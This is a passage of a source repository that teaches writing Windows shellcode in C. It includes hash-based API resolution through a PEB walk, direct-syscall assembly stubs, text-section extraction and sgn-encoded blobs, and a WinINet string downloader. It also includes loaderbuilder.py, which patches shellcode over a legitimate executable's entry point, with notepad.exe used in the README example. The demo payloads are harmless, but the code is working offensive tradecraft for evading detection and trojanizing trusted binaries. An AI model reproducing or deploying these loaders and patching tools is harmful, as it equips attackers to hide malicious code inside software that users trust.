mem_size = MAX_BUFFER; 39 | LPVOID ptr_memory = NULL; 40 | 41 | #ifndef _DEBUG 42 | NTSTATUS status = ZwAllocateVirtualMemory(NtCurrentProcess(), &ptr_memory, 0, &mem_size, MEM_COMMIT, PAGE_READWRITE); 43 | if (status != STATUS_SUCCESS) 44 | goto cleanup; 45 | #else 46 | uint64_t _VirtualAlloc = getFunctionPtr(HASH_KERNEL32, HASH_VIRTUALALLOC); 47 | ptr_memory = ((VIRTUALALLOC)_VirtualAlloc)(0, mem_size, MEM_COMMIT, PAGE_READWRITE); 48 | #endif 49 | 50 | h_session = ((INTERNETOPENA)_InternetOpenA)(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); 51 | if (!h_session) 52 | goto cleanup; 53 | 54 | h_connect = ((INTERNETCONNECTA)_InternetConnectA)(h_session, hostname, port, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 1); 55 | if (!h_connect) 56 | goto cleanup; 57 | 58 | h_request = ((HTTPOPENREQUESTA)_HttpOpenRequestA)(h_connect, (LPCTSTR)&method, (LPCTSTR)&endpoint, NULL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_RELOAD, 1); 59 | if (!h_request) 60 | goto cleanup; 61 | 62 | if (((HTTPSENDREQUESTA)_HttpSendRequestA)(h_request, NULL, 0, NULL, 0) == FAIL) 63 | goto cleanup; 64 | 65 | do { 66 | 67 | if (((INTERNETREADFILE)_InternetReadFile)(h_request, (LPVOID)((uint64_t)ptr_memory + dw_read_total), MAX_BUFFER - dw_read_total, &dw_read) == FAIL) 68 | break; 69 | 70 | dw_read_total += dw_read; 71 | 72 | } while (dw_read); 73 | 74 | if(dw_read_total) 75 | ((MESSAGEBOXA)_MessageBoxA)(0, ptr_memory, ptr_memory, 1); 76 | 77 | dw_success = SUCCESS; 78 | 79 | cleanup: 80 | 81 | ((INTERNETCLOSEHANDLE)_InternetCloseHandle)(h_session); 82 | ((INTERNETCLOSEHANDLE)_InternetCloseHandle)(h_connect); 83 | ((INTERNETCLOSEHANDLE)_InternetCloseHandle)(h_request); 84 | 85 | if(ptr_memory != NULL) 86 | ((VIRTUALFREE)_VirtualFree)(ptr_memory, 0, MEM_RELEASE); 87 | 88 | return dw_success; 89 | 90 | } -------------------------------------------------------------------------------- /DownloadString_Syscalls/Syscalls.h: 
-------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "windows.h" 4 | #include "syscalls-asm.h" 5 | 6 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 7 | #define STATUS_SUCCESS 0 8 | 9 | EXTERN_C NTSTATUS NtAllocateVirtualMemory( 10 | IN HANDLE ProcessHandle, 11 | IN OUT PVOID * BaseAddress, 12 | IN ULONG ZeroBits, 13 | IN OUT PSIZE_T RegionSize, 14 | IN ULONG AllocationType, 15 | IN ULONG Protect); 16 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/adjuststack.asm: -------------------------------------------------------------------------------- 1 | ; Based on http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html and https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | 3 | extern go 4 | global alignstack 5 | 6 | segment .text 7 | 8 | alignstack: 9 | push rsi 10 | mov rsi, rsp 11 | and rsp, 0FFFFFFFFFFFFFFF0h 12 | sub rsp, 020h 13 | call go 14 | mov rsp, rsi 15 | pop rsi 16 | ret 17 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/extract.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for i in $(objdump -d DownloadString_Syscall.exe | grep "^ " | cut -f2); do echo -e -n "\x$i"; done >> DownloadString_Syscall.bin 3 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/makefile: -------------------------------------------------------------------------------- 1 | # based on https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | make: 3 | nasm -f win64 adjuststack.asm -o adjuststack.o 4 | x86_64-w64-mingw32-gcc ApiResolve.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o ApiResolve.o -Wl,--no-seh 5 | x86_64-w64-mingw32-gcc DownloadString_Syscall.c -Wall -m64 
-masm=intel -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o DownloadString_Syscall.o -Wl,--no-seh 6 | x86_64-w64-mingw32-ld -s adjuststack.o ApiResolve.o DownloadString_Syscall.o -o DownloadString_Syscall.exe 7 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/syscalls-asm.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Syscalls.h" 3 | 4 | #define ZwAllocateVirtualMemory NtAllocateVirtualMemory 5 | __asm__("NtAllocateVirtualMemory: \n\ 6 | mov rax, gs:[0x60] \n\ 7 | NtAllocateVirtualMemory_Check_X_X_XXXX: \n\ 8 | cmp dword ptr [rax+0x118], 6 \n\ 9 | je NtAllocateVirtualMemory_Check_6_X_XXXX \n\ 10 | cmp dword ptr [rax+0x118], 10 \n\ 11 | je NtAllocateVirtualMemory_Check_10_0_XXXX \n\ 12 | jmp NtAllocateVirtualMemory_SystemCall_Unknown \n\ 13 | NtAllocateVirtualMemory_Check_6_X_XXXX: \n\ 14 | cmp dword ptr [rax+0x11c], 1 \n\ 15 | je NtAllocateVirtualMemory_Check_6_1_XXXX \n\ 16 | cmp dword ptr [rax+0x11c], 2 \n\ 17 | je NtAllocateVirtualMemory_SystemCall_6_2_XXXX \n\ 18 | cmp dword ptr [rax+0x11c], 3 \n\ 19 | je NtAllocateVirtualMemory_SystemCall_6_3_XXXX \n\ 20 | jmp NtAllocateVirtualMemory_SystemCall_Unknown \n\ 21 | NtAllocateVirtualMemory_Check_6_1_XXXX: \n\ 22 | cmp word ptr [rax+0x120], 7600 \n\ 23 | je NtAllocateVirtualMemory_SystemCall_6_1_7600 \n\ 24 | cmp word ptr [rax+0x120], 7601 \n\ 25 | je NtAllocateVirtualMemory_SystemCall_6_1_7601 \n\ 26 | jmp NtAllocateVirtualMemory_SystemCall_Unknown \n\ 27 | NtAllocateVirtualMemory_Check_10_0_XXXX: \n\ 28 | cmp word ptr [rax+0x120], 10240 \n\ 29 | je NtAllocateVirtualMemory_SystemCall_10_0_10240 \n\ 30 | cmp word ptr [rax+0x120], 10586 \n\ 31 | je NtAllocateVirtualMemory_SystemCall_10_0_10586 \n\ 32 | cmp word ptr [rax+0x120], 14393 \n\ 33 | je NtAllocateVirtualMemory_SystemCall_10_0_14393 \n\ 34 | cmp word ptr [rax+0x120], 15063 \n\ 35 | je 
NtAllocateVirtualMemory_SystemCall_10_0_15063 \n\ 36 | cmp word ptr [rax+0x120], 16299 \n\ 37 | je NtAllocateVirtualMemory_SystemCall_10_0_16299 \n\ 38 | cmp word ptr [rax+0x120], 17134 \n\ 39 | je NtAllocateVirtualMemory_SystemCall_10_0_17134 \n\ 40 | cmp word ptr [rax+0x120], 17763 \n\ 41 | je NtAllocateVirtualMemory_SystemCall_10_0_17763 \n\ 42 | cmp word ptr [rax+0x120], 18362 \n\ 43 | je NtAllocateVirtualMemory_SystemCall_10_0_18362 \n\ 44 | cmp word ptr [rax+0x120], 18363 \n\ 45 | je NtAllocateVirtualMemory_SystemCall_10_0_18363 \n\ 46 | cmp word ptr [rax+0x120], 19041 \n\ 47 | je NtAllocateVirtualMemory_SystemCall_10_0_19041 \n\ 48 | cmp word ptr [rax+0x120], 19042 \n\ 49 | je NtAllocateVirtualMemory_SystemCall_10_0_19042 \n\ 50 | jmp NtAllocateVirtualMemory_SystemCall_Unknown \n\ 51 | NtAllocateVirtualMemory_SystemCall_6_1_7600: \n\ 52 | mov eax, 0x0015 \n\ 53 | jmp NtAllocateVirtualMemory_Epilogue \n\ 54 | NtAllocateVirtualMemory_SystemCall_6_1_7601: \n\ 55 | mov eax, 0x0015 \n\ 56 | jmp NtAllocateVirtualMemory_Epilogue \n\ 57 | NtAllocateVirtualMemory_SystemCall_6_2_XXXX: \n\ 58 | mov eax, 0x0016 \n\ 59 | jmp NtAllocateVirtualMemory_Epilogue \n\ 60 | NtAllocateVirtualMemory_SystemCall_6_3_XXXX: \n\ 61 | mov eax, 0x0017 \n\ 62 | jmp NtAllocateVirtualMemory_Epilogue \n\ 63 | NtAllocateVirtualMemory_SystemCall_10_0_10240: \n\ 64 | mov eax, 0x0018 \n\ 65 | jmp NtAllocateVirtualMemory_Epilogue \n\ 66 | NtAllocateVirtualMemory_SystemCall_10_0_10586: \n\ 67 | mov eax, 0x0018 \n\ 68 | jmp NtAllocateVirtualMemory_Epilogue \n\ 69 | NtAllocateVirtualMemory_SystemCall_10_0_14393: \n\ 70 | mov eax, 0x0018 \n\ 71 | jmp NtAllocateVirtualMemory_Epilogue \n\ 72 | NtAllocateVirtualMemory_SystemCall_10_0_15063: \n\ 73 | mov eax, 0x0018 \n\ 74 | jmp NtAllocateVirtualMemory_Epilogue \n\ 75 | NtAllocateVirtualMemory_SystemCall_10_0_16299: \n\ 76 | mov eax, 0x0018 \n\ 77 | jmp NtAllocateVirtualMemory_Epilogue \n\ 78 | NtAllocateVirtualMemory_SystemCall_10_0_17134: \n\ 79 | mov 
eax, 0x0018 \n\ 80 | jmp NtAllocateVirtualMemory_Epilogue \n\ 81 | NtAllocateVirtualMemory_SystemCall_10_0_17763: \n\ 82 | mov eax, 0x0018 \n\ 83 | jmp NtAllocateVirtualMemory_Epilogue \n\ 84 | NtAllocateVirtualMemory_SystemCall_10_0_18362: \n\ 85 | mov eax, 0x0018 \n\ 86 | jmp NtAllocateVirtualMemory_Epilogue \n\ 87 | NtAllocateVirtualMemory_SystemCall_10_0_18363: \n\ 88 | mov eax, 0x0018 \n\ 89 | jmp NtAllocateVirtualMemory_Epilogue \n\ 90 | NtAllocateVirtualMemory_SystemCall_10_0_19041: \n\ 91 | mov eax, 0x0018 \n\ 92 | jmp NtAllocateVirtualMemory_Epilogue \n\ 93 | NtAllocateVirtualMemory_SystemCall_10_0_19042: \n\ 94 | mov eax, 0x0018 \n\ 95 | jmp NtAllocateVirtualMemory_Epilogue \n\ 96 | NtAllocateVirtualMemory_SystemCall_Unknown: \n\ 97 | ret \n\ 98 | NtAllocateVirtualMemory_Epilogue: \n\ 99 | mov r10, rcx \n\ 100 | syscall \n\ 101 | ret \n\ 102 | "); 103 | 104 | 105 | -------------------------------------------------------------------------------- /HelloWorld/APIResolve.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "windows.h" 5 | 6 | #include "wininet.h" 7 | 8 | uint64_t getFunctionPtr(unsigned long, unsigned long); 9 | 10 | // ---- KERNEL32 ---- 11 | #define HASH_KERNEL32 0x7040ee75 12 | #define HASH_LOADLIBRARYA 0x5fbff0fb 13 | #define HASH_VIRTUALFREE 0x668fcf2e 14 | #define HASH_VIRTUALALLOC 0x382c0f97 15 | 16 | typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR); 17 | typedef BOOL(WINAPI* VIRTUALFREE)(LPVOID, SIZE_T, DWORD); 18 | typedef LPVOID(WINAPI* VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD); 19 | 20 | // ---- USER32 ---- 21 | #define HASH_USER32 0x5a6bd3f3 22 | #define HASH_MESSAGEBOXA 0x384f14b4 23 | 24 | typedef int(WINAPI* MESSAGEBOXA)(HWND, LPCSTR, LPCSTR, UINT); 25 | 26 | // ---- Wininet.dll ---- 27 | #define HASH_WININET 0x8dbd9c6d 28 | #define HASH_INTERNETOPENA 0xf4ad70a1 29 | #define HASH_INTERNETREADFILE 0xfb4f8eaa 30 | #define HASH_INTERNETCLOSEHANDLE 
0x4241bef0 31 | #define HASH_INTERNETCONNECTA 0x44536159 32 | #define HASH_HTTPOPENREQUESTA 0xf0fcb9e1 33 | #define HASH_HTTPSENDREQUESTA 0x915115b9 34 | 35 | typedef HINTERNET(WINAPI* INTERNETOPENA)(LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD); 36 | typedef BOOL(WINAPI* INTERNETREADFILE)(HINTERNET, LPVOID, DWORD, LPDWORD); 37 | typedef BOOL(WINAPI* INTERNETCLOSEHANDLE)(HINTERNET); 38 | typedef HINTERNET(WINAPI* INTERNETCONNECTA)(HINTERNET, LPCSTR, INTERNET_PORT, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR); 39 | typedef HINTERNET(WINAPI* HTTPOPENREQUESTA)(HINTERNET, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR*, DWORD, DWORD_PTR); 40 | typedef BOOL(WINAPI* HTTPSENDREQUESTA)(HINTERNET, LPCSTR, DWORD, LPVOID, DWORD); 41 | 42 | typedef PCSTR(WINAPI* STRSTRA)(PCSTR, PCSTR); 43 | 44 | typedef struct _UNICODE_STR { 45 | USHORT Length; 46 | USHORT MaximumLength; 47 | PWSTR pBuffer; 48 | } UNICODE_STR, * PUNICODE_STR; 49 | 50 | typedef struct _PEB_LDR_DATA 51 | { 52 | DWORD dwLength; 53 | DWORD dwInitialized; 54 | LPVOID lpSsHandle; 55 | LIST_ENTRY InLoadOrderModuleList; 56 | LIST_ENTRY InMemoryOrderModuleList; 57 | LIST_ENTRY InInitializationOrderModuleList; 58 | LPVOID lpEntryInProgress; 59 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 60 | 61 | typedef struct _LDR_DATA_TABLE_ENTRY 62 | { 63 | LIST_ENTRY InMemoryOrderModuleList; 64 | LIST_ENTRY InInitializationOrderModuleList; 65 | PVOID DllBase; 66 | PVOID EntryPoint; 67 | ULONG SizeOfImage; 68 | UNICODE_STR FullDllName; 69 | UNICODE_STR BaseDllName; 70 | ULONG Flags; 71 | SHORT LoadCount; 72 | SHORT TlsIndex; 73 | LIST_ENTRY HashTableEntry; 74 | ULONG TimeDateStamp; 75 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 76 | 77 | typedef struct _PEB_FREE_BLOCK 78 | { 79 | struct _PEB_FREE_BLOCK* pNext; 80 | DWORD dwSize; 81 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 82 | 83 | typedef struct __PEB 84 | { 85 | BYTE bInheritedAddressSpace; 86 | BYTE bReadImageFileExecOptions; 87 | BYTE bBeingDebugged; 88 | BYTE bSpareBool; 89 | LPVOID lpMutant; 90 
| LPVOID lpImageBaseAddress; 91 | PPEB_LDR_DATA pLdr; 92 | LPVOID lpProcessParameters; 93 | LPVOID lpSubSystemData; 94 | LPVOID lpProcessHeap; 95 | PRTL_CRITICAL_SECTION pFastPebLock; 96 | LPVOID lpFastPebLockRoutine; 97 | LPVOID lpFastPebUnlockRoutine; 98 | DWORD dwEnvironmentUpdateCount; 99 | LPVOID lpKernelCallbackTable; 100 | DWORD dwSystemReserved; 101 | DWORD dwAtlThunkSListPtr32; 102 | PPEB_FREE_BLOCK pFreeList; 103 | DWORD dwTlsExpansionCounter; 104 | LPVOID lpTlsBitmap; 105 | DWORD dwTlsBitmapBits[2]; 106 | LPVOID lpReadOnlySharedMemoryBase; 107 | LPVOID lpReadOnlySharedMemoryHeap; 108 | LPVOID lpReadOnlyStaticServerData; 109 | LPVOID lpAnsiCodePageData; 110 | LPVOID lpOemCodePageData; 111 | LPVOID lpUnicodeCaseTableData; 112 | DWORD dwNumberOfProcessors; 113 | DWORD dwNtGlobalFlag; 114 | LARGE_INTEGER liCriticalSectionTimeout; 115 | DWORD dwHeapSegmentReserve; 116 | DWORD dwHeapSegmentCommit; 117 | DWORD dwHeapDeCommitTotalFreeThreshold; 118 | DWORD dwHeapDeCommitFreeBlockThreshold; 119 | DWORD dwNumberOfHeaps; 120 | DWORD dwMaximumNumberOfHeaps; 121 | LPVOID lpProcessHeaps; 122 | LPVOID lpGdiSharedHandleTable; 123 | LPVOID lpProcessStarterHelper; 124 | DWORD dwGdiDCAttributeList; 125 | LPVOID lpLoaderLock; 126 | DWORD dwOSMajorVersion; 127 | DWORD dwOSMinorVersion; 128 | WORD wOSBuildNumber; 129 | WORD wOSCSDVersion; 130 | DWORD dwOSPlatformId; 131 | DWORD dwImageSubsystem; 132 | DWORD dwImageSubsystemMajorVersion; 133 | DWORD dwImageSubsystemMinorVersion; 134 | DWORD dwImageProcessAffinityMask; 135 | DWORD dwGdiHandleBuffer[34]; 136 | LPVOID lpPostProcessInitRoutine; 137 | LPVOID lpTlsExpansionBitmap; 138 | DWORD dwTlsExpansionBitmapBits[32]; 139 | DWORD dwSessionId; 140 | ULARGE_INTEGER liAppCompatFlags; 141 | ULARGE_INTEGER liAppCompatFlagsUser; 142 | LPVOID lppShimData; 143 | LPVOID lpAppCompatInfo; 144 | UNICODE_STR usCSDVersion; 145 | LPVOID lpActivationContextData; 146 | LPVOID lpProcessAssemblyStorageMap; 147 | LPVOID 
lpSystemDefaultActivationContextData; 148 | LPVOID lpSystemAssemblyStorageMap; 149 | DWORD dwMinimumStackCommit; 150 | } _PEB, * _PPEB; 151 | -------------------------------------------------------------------------------- /HelloWorld/ApiResolve.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | 3 | static uint64_t getDllBase(unsigned long); 4 | static uint64_t loadDll(unsigned long); 5 | static uint64_t parseHdrForPtr(uint64_t, unsigned long); 6 | 7 | static unsigned long djb2(unsigned char*); 8 | static unsigned long unicode_djb2(const wchar_t* str); 9 | static WCHAR* toLower(WCHAR* str); 10 | 11 | uint64_t 12 | getFunctionPtr(unsigned long dll_hash, unsigned long function_hash) { 13 | 14 | uint64_t dll_base = 0x00; 15 | uint64_t ptr_function = 0x00; 16 | 17 | dll_base = getDllBase(dll_hash); 18 | if (dll_base == 0) { 19 | dll_base = loadDll(dll_hash); 20 | if (dll_base == 0) 21 | return 0; 22 | } 23 | 24 | ptr_function = parseHdrForPtr(dll_base, function_hash); 25 | 26 | return ptr_function; 27 | } 28 | 29 | static uint64_t 30 | loadDll(unsigned long dll_hash) { 31 | 32 | uint64_t kernel32_base = 0x00; 33 | uint64_t fptr_loadLibary = 0x00; 34 | uint64_t ptr_loaded_dll = 0x00; 35 | 36 | kernel32_base = getDllBase(HASH_KERNEL32); 37 | if (kernel32_base == 0x00) 38 | return 0; 39 | 40 | fptr_loadLibary = parseHdrForPtr(kernel32_base, HASH_LOADLIBRARYA); 41 | if (fptr_loadLibary == 0x00) 42 | return 0; 43 | 44 | if (dll_hash == HASH_USER32) { 45 | char dll_name[] = { 'U', 's', 'e', 'r', '3' ,'2' ,'.', 'd', 'l', 'l', 0x00 }; 46 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 47 | } else if (dll_hash == HASH_WININET) { 48 | char dll_name[] = { 'W', 'i', 'n', 'i', 'n', 'e', 't', '.', 'd','l','l',0x00 }; 49 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 50 | } 51 | 52 | return ptr_loaded_dll; 53 | 54 | } 55 | 56 | static uint64_t 57 | parseHdrForPtr(uint64_t 
dll_base, unsigned long function_hash) { 58 | 59 | PIMAGE_NT_HEADERS nt_hdrs = NULL; 60 | PIMAGE_DATA_DIRECTORY data_dir= NULL; 61 | PIMAGE_EXPORT_DIRECTORY export_dir= NULL; 62 | 63 | uint32_t* ptr_exportadrtable = 0x00; 64 | uint32_t* ptr_namepointertable = 0x00; 65 | uint16_t* ptr_ordinaltable = 0x00; 66 | 67 | uint32_t idx_functions = 0x00; 68 | 69 | unsigned char* ptr_function_name = NULL; 70 | 71 | 72 | nt_hdrs = (PIMAGE_NT_HEADERS)(dll_base + (uint64_t)((PIMAGE_DOS_HEADER)(size_t)dll_base)->e_lfanew); 73 | data_dir = (PIMAGE_DATA_DIRECTORY)&nt_hdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; 74 | export_dir = (PIMAGE_EXPORT_DIRECTORY)(dll_base + (uint64_t)data_dir->VirtualAddress); 75 | 76 | ptr_exportadrtable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfFunctions); 77 | ptr_namepointertable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfNames); 78 | ptr_ordinaltable = (uint16_t*)(dll_base + (uint64_t)export_dir->AddressOfNameOrdinals); 79 | 80 | for(idx_functions = 0; idx_functions < export_dir->NumberOfNames; idx_functions++){ 81 | 82 | ptr_function_name = (unsigned char*)dll_base + (ptr_namepointertable[idx_functions]); 83 | if (djb2(ptr_function_name) == function_hash) { 84 | WORD nameord = ptr_ordinaltable[idx_functions]; 85 | DWORD rva = ptr_exportadrtable[nameord]; 86 | return dll_base + rva; 87 | } 88 | 89 | } 90 | 91 | return 0; 92 | } 93 | 94 | 95 | 96 | static uint64_t 97 | getDllBase(unsigned long dll_hash) { 98 | 99 | _PPEB ptr_peb = NULL; 100 | PPEB_LDR_DATA ptr_ldr_data = NULL; 101 | PLDR_DATA_TABLE_ENTRY ptr_module_entry = NULL, ptr_start_module = NULL; 102 | PUNICODE_STR dll_name = NULL; 103 | 104 | ptr_peb = (_PEB*)__readgsqword(0x60); 105 | ptr_ldr_data = ptr_peb->pLdr; 106 | ptr_module_entry = ptr_start_module = (PLDR_DATA_TABLE_ENTRY)ptr_ldr_data->InMemoryOrderModuleList.Flink; 107 | 108 | do{ 109 | 110 | dll_name = &ptr_module_entry->BaseDllName; 111 | 112 | if (dll_name->pBuffer == NULL) 113 | 
return 0; 114 | 115 | if (unicode_djb2(toLower(dll_name->pBuffer)) == dll_hash) 116 | return (uint64_t)ptr_module_entry->DllBase; 117 | 118 | ptr_module_entry = (PLDR_DATA_TABLE_ENTRY)ptr_module_entry->InMemoryOrderModuleList.Flink; 119 | 120 | } while (ptr_module_entry != ptr_start_module); 121 | 122 | return 0; 123 | 124 | } 125 | 126 | static unsigned long 127 | djb2(unsigned char* str) 128 | { 129 | unsigned long hash = 5381; 130 | int c; 131 | 132 | while ((c = *str++)) 133 | hash = ((hash << 5) + hash) + c; 134 | 135 | return hash; 136 | } 137 | 138 | unsigned long 139 | unicode_djb2(const wchar_t* str) 140 | { 141 | 142 | unsigned long hash = 5381; 143 | DWORD val; 144 | 145 | while (*str != 0) { 146 | val = (DWORD)*str++; 147 | hash = ((hash << 5) + hash) + val; 148 | } 149 | 150 | return hash; 151 | 152 | } 153 | 154 | static WCHAR* 155 | toLower(WCHAR *str) 156 | { 157 | 158 | WCHAR* start = str; 159 | 160 | while (*str) { 161 | 162 | if (*str <= L'Z' && *str >= 'A') { 163 | *str += 32; 164 | } 165 | 166 | str += 1; 167 | 168 | } 169 | 170 | return start; 171 | 172 | } -------------------------------------------------------------------------------- /HelloWorld/HelloWorld.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/HelloWorld/HelloWorld.bin -------------------------------------------------------------------------------- /HelloWorld/HelloWorld.bin.sgn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/HelloWorld/HelloWorld.bin.sgn -------------------------------------------------------------------------------- /HelloWorld/HelloWorld.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | 3 | #define FAIL 0 4 | 
#define SUCCESS 1

// Entry point of the sample. A _DEBUG build gets a normal main() so the code
// can be run and stepped as an ordinary executable; the release build exposes
// go(), which alignstack in adjuststack.asm calls once the stack is set up.
// Returns SUCCESS (1) after showing the box, FAIL (0) if MessageBoxA could not
// be resolved.
#ifdef _DEBUG
int
main(void) {
#else
int
go(void) {
#endif

    // user32 is not necessarily loaded in the host process; getFunctionPtr()
    // falls back to LoadLibraryA for HASH_USER32 (see loadDll in ApiResolve.c).
    uint64_t _MessageBoxA = getFunctionPtr(HASH_USER32, HASH_MESSAGEBOXA);

    if (_MessageBoxA == 0x00)
        return FAIL;

    // Built element-wise, presumably so the bytes are emitted by the code
    // itself instead of landing in .rdata (the README's "everything in .text"
    // goal). Used as both caption and body.
    char message[] = { 'M', 'o', 'i', 'n', 0x00 };
    ((MESSAGEBOXA)_MessageBoxA)(0, message, message, 1);

    return SUCCESS;

}
--------------------------------------------------------------------------------
/HelloWorld/adjuststack.asm:
--------------------------------------------------------------------------------
; Based on http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html and https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/

extern go
global alignstack

segment .text

; First code in the image (presumably why adjuststack.o is linked first in the
; makefile, so the extracted .text begins here). Saves rsi, aligns rsp to 16
; bytes as the x64 calling convention requires at a call, reserves the 32-byte
; shadow space, calls go() and then restores the caller's stack exactly.
alignstack:
    push rsi
    mov rsi, rsp
    and rsp, 0FFFFFFFFFFFFFFF0h
    sub rsp, 020h
    call go
    mov rsp, rsi
    pop rsi
    ret

--------------------------------------------------------------------------------
/HelloWorld/extract.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Takes the opcode-byte column (field 2) of every objdump disassembly line and
# appends the bytes to HelloWorld.bin. Note the >>: a second run appends a
# second copy rather than replacing the file, so remove the .bin before
# re-extracting. Relies on bash's builtin echo honouring -e for \x escapes.
for i in $(objdump -d HelloWorld.exe | grep "^ " | cut -f2); do echo -e -n "\x$i"; done >> HelloWorld.bin

--------------------------------------------------------------------------------
/HelloWorld/makefile:
--------------------------------------------------------------------------------
# based on https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/
# -nostdlib, -fno-ident, -fno-asynchronous-unwind-tables and --no-seh keep the
# CRT, the .comment string and unwind data out of the image, so what the program
# needs at run time is contained in .text; -s strips symbols from the final exe.
make:
	nasm -f win64 adjuststack.asm -o adjuststack.o
	x86_64-w64-mingw32-gcc ApiResolve.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o ApiResolve.o -Wl,--no-seh
	x86_64-w64-mingw32-gcc HelloWorld.c -Wall -m64 -masm=intel -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o HelloWorld.o -Wl,--no-seh
	x86_64-w64-mingw32-ld -s adjuststack.o ApiResolve.o HelloWorld.o -o HelloWorld.exe

--------------------------------------------------------------------------------
/Loaders/loaderbuilder.py:
--------------------------------------------------------------------------------
import argparse
import lief

def main(f_name_shellcode, f_nameloader, output):
    """Overwrite the code at f_nameloader's entry point with the bytes of
    f_name_shellcode and write the result to output.

    The host executable is parsed with lief, the entry-point RVA is located in
    the section table, and the raw blob is patched in at that RVA, destroying
    the host's original entry code. The resulting file no longer matches the
    original's hash, and any embedded Authenticode signature no longer
    validates — the file-level indicator such a patched binary leaves.
    Prints progress and returns None on every failure path.
    """

    loader = lief.parse(f_nameloader)
    # NOTE(review): `is None` is the idiomatic identity test.
    if loader == None:
        print("[-] Failed parsing binary")
        return

    # NOTE(review): the file object is never closed; a with-block would bound it.
    shellcode = open(f_name_shellcode, "rb").read()
    section_entrypoint = None

    print(f"[*] Read {f_name_shellcode} ({str(len(shellcode))} bytes)")
    entrypoint = loader.optional_header.addressof_entrypoint
    print(f"[*] Parsing {f_nameloader}")
    print(f"[*] Entrypoint: {hex(entrypoint)}")
    print(f"[**] Searching entrypoint in sections ... ")
    # Find the section whose virtual range contains the entry-point RVA.
    for section in loader.sections:
        if entrypoint >= section.virtual_address and entrypoint <= section.virtual_address + section.size:
            print(f"[**] Entrypoint in: " + section.name)
            section_entrypoint = section

    if not section_entrypoint:
        print(f"[-] Could not map entrypoint to section :(")
        return

    print(f"[*] Entrypoint: {hex(entrypoint)}")
    # Refuse when the blob would run past the end of the section.
    if entrypoint + section_entrypoint.virtual_address + len(shellcode) >= section_entrypoint.virtual_address + section_entrypoint.size:
        print(f"[-] Not enough space between entrypoint and section end for shellcode :(")
        return

    loader.patch_address(entrypoint, list(shellcode))
    builder = lief.PE.Builder(loader)
    builder.build()
    builder.write(output)

if __name__ == "__main__":

    # All three arguments are mandatory; lief reports parse failures via None.
    parser = argparse.ArgumentParser()
    parser.add_argument("-shellcode", required=True)
    parser.add_argument("-loader", required=True)
    parser.add_argument("-output", required=True)
    args = parser.parse_args()

    main(args.shellcode, args.loader, args.output)
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# C-To-Shellcode-Examples

This repository contains examples of how to write C code which compiles down to an executable living fully in its text segment.
Thus, when extracting the text segment you will obtain position-independent code which you can encode with your favourite shellcode encoder.

The **DownloadString_Syscalls** program makes use of direct syscalls to obtain memory. Syscalls were generated using [Inline Whisperer](https://github.com/outflanknl/InlineWhispers).
Sample files are provided as .bin (raw extracted text segment) and .bin.sgn (text segment encoded with [sgn](https://github.com/EgeBalci/sgn/)). You can execute them using any shellcode loader.

## Loader Creation

Since the output is 100% position independent, there are multiple ways to execute the code. One is to use traditional shellcode loaders / injectors.
Another way is to take an existing **.exe** file and overwrite the part of its **.text** segment that the entrypoint in the **optional_header** points to with the PIC.
I have added **loaderbuilder.py** to automate this.

```
python loaders\loaderbuilder.py -shellcode .\HelloWorld\HelloWorld.bin -loader C:\Users\user\Desktop\notepad.exe -output C:\Users\user\Desktop\cool.exe
```

Obviously this doesn't work with encoded PIC, since the .text segment is not writable by default.
**Please note** that the .exe file needs to be copied from system32 to somewhere else before patching. This appears to be a bug in python-lief, but I can't narrow it down :'(.

## Credits

The idea has been well described by various researchers and is nothing new, please see:

- https://vxug.fakedoma.in/papers/VXUG/Exclusive/FromaCprojectthroughassemblytoshellcodeHasherezade.pdf
- http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html
